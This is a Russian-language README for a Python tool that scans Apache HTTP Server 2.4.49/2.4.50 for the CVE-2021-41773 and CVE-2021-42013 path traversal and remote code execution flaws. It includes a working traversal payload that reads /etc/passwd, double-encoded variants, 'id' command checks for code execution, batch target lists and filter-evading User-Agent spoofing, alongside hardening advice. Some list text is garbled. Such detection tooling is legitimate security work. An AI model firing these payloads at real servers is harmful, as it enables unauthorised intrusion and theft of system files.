
Сканер на основе Python для обнаружения уязвимостей обхода пути и удалённого выполнения кода CVE-2021-41773 и CVE-2021-42013 в Apache HTTP Server 2.4.49 и 2.4.50.
Комплексный сканер уязвимостей на Python для обнаружения CVE-2021-41773 и CVE-2021-42013 — уязвимостей обхода пути и удаленного выполнения кода в Apache HTTP Server версий 2.4.49 и 2.4.50.
CVE-2021-41773 и CVE-2021-42013 — критические уязвимости, затрагивающие Apache HTTP Server, которые позволяют злоумышленникам:
Эти уязвимости получили широкую огласку в октябре 2021 года и активно эксплуатировались в реальных атаках.
.%2e) обходить ограничения каталогов/etc/passwd%%32%65)✅ Обнаружение обоих CVE: Проверка на CVE-2021-41773 и CVE-2021-42013 ✅ Тестирование обхода пути: Несколько вариаций полезной нагрузки для попыток доступа к файлам ✅ Тестирование RCE: Проверка удаленного выполнения кода, если включен mod_cgi ✅ Пакетное сканирование: Сканирование нескольких целей из файла ✅ Цветной вывод: Легко читаемые форматированные результаты ✅ Настраиваемый таймаут: Регулируемый таймаут запроса для ненадежных сетей ✅ Подмена User-Agent: Обход базовых механизмов фильтрации
requestscoloramahttps://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
pip3 install -r requirements.txt
Или установка вручную:
pip3 install requests colorama
python3 cve_scanner.py -u http://192.168.1.100
python3 cve_scanner.py -u https://target.com
python3 cve_scanner.py -u http://target.com -t 15
python3 cve_scanner.py -l targets.txt
python3 cve_scanner.py -h
| Аргумент | Короткий | Тип | Описание |
|---|---|---|---|
--url | -u | STRING | Целевой URL (например, http://example.com) |
--list | -l | FILE | Файл со списком целей (по одной на строку) |
--timeout | -t | INTEGER | Таймаут запроса в секундах (по умолчанию: 10) |
python3 cve_scanner.py -u http://192.168.1.100
Создайте targets.txt:
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
Затем выполните:
python3 cve_scanner.py -l targets.txt -t 15
python3 cve_scanner.py -u http://target.com -t 30
Сканер предоставляет подробный вывод, включая:
Пример вывода:
============================================================
CVE-2021-41773 / CVE-2021-42013 Сканер уязвимостей
============================================================
[*] Цель: http://192.168.1.100
[*] Тестирование CVE-2021-41773 (Apache 2.4.49)...
[+] УЯЗВИМ к CVE-2021-41773!
[+] Полезная нагрузка: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Ответ:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Сводка сканирования
============================================================
[!] Цель УЯЗВИМА!
[!] Требуется немедленное исправление!
[*] Рекомендация: Обновитесь до Apache HTTP Server 2.4.51 или новее
============================================================
.%2e)/cgi-bin/, /icons/, /images//etc/passwd и /etc/shadow%%32%65)id для проверки выполнения кодаuid= и gid= в ответеСканер ищет:
root: или daemon: из /etc/passwduid= и gid= от выполнения команды id<Directory />
Require all denied
</Directory>
# Ограничение доступа к конфиденциальным каталогам
<Directory /cgi-bin>
Require all denied
</Directory>
# Отключение символических ссылок, если не нужны
Options -FollowSymLinks
# Включение заголовков безопасности
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
# Проверка версии Apache
apache2 -v
httpd -v
| Версия | Статус | Действие |
|---|---|---|
| 2.4.49 | ❌ Уязвима | Немедленно обновить |
| 2.4.50 | ⚠️ Частично исправлена | Обновиться до 2.4.51+ |
| 2.4.51+ | ✅ Исправлена | Действий не требуется |
⚠️ ВАЖНО: Этот инструмент предназначен ТОЛЬКО для авторизованных проверок безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН в соответствии с законами, такими как Computer Fraud and Abuse Act (CFAA) и аналогичным законодательством по всему миру.
Только авторизованное использование:
Предупреждение о неправомерном использовании: Пользователи несут ответственность за получение явного разрешения перед тестированием любой цели. Авторы не несут ответственности за несанкционированное использование.
Этот сканер идеально подходит для:
.
├── cve_scanner.py # Основной скрипт сканера
├── requirements.txt # Зависимости Python
├── README.md # Этот файл
├── targets.txt # Пример списка целей
└── LICENSE # Информация о лицензии
requests==2.28.1
colorama==0.4.5
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
Решение: Увеличьте таймаут с помощью опции -t
python3 cve_scanner.py -u http://target.com -t 30
Решение: Скрипт по умолчанию отключает проверку SSL. Если проблема сохраняется, обновите сертификаты Python:
pip3 install --upgrade certifi
Решение: Убедитесь, что все зависимости установлены
pip3 install -r requirements.txt
Решение: Сделайте скрипт исполняемым
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
-l с файлом целей для множественных сканированийВклад приветствуется! Чтобы внести свой вклад:
git checkout -b feature/improvement)git commit -m 'Добавить улучшение')git push origin feature/improvement)Пожалуйста, убедитесь:
Этот проект лицензирован по лицензии MIT. Подробности см. в файле LICENSE.
Инструмент для проверки безопасности
Создан в образовательных целях и для авторизованных проверок безопасности.
По вопросам, проблемам или предложениям, пожалуйста, откройте issue на GitHub.
Последнее обновление: Ноябрь 2025
Статус: Активная разработка
Протестировано на: Python 3.8+, Apache 2.4.49, 2.4.50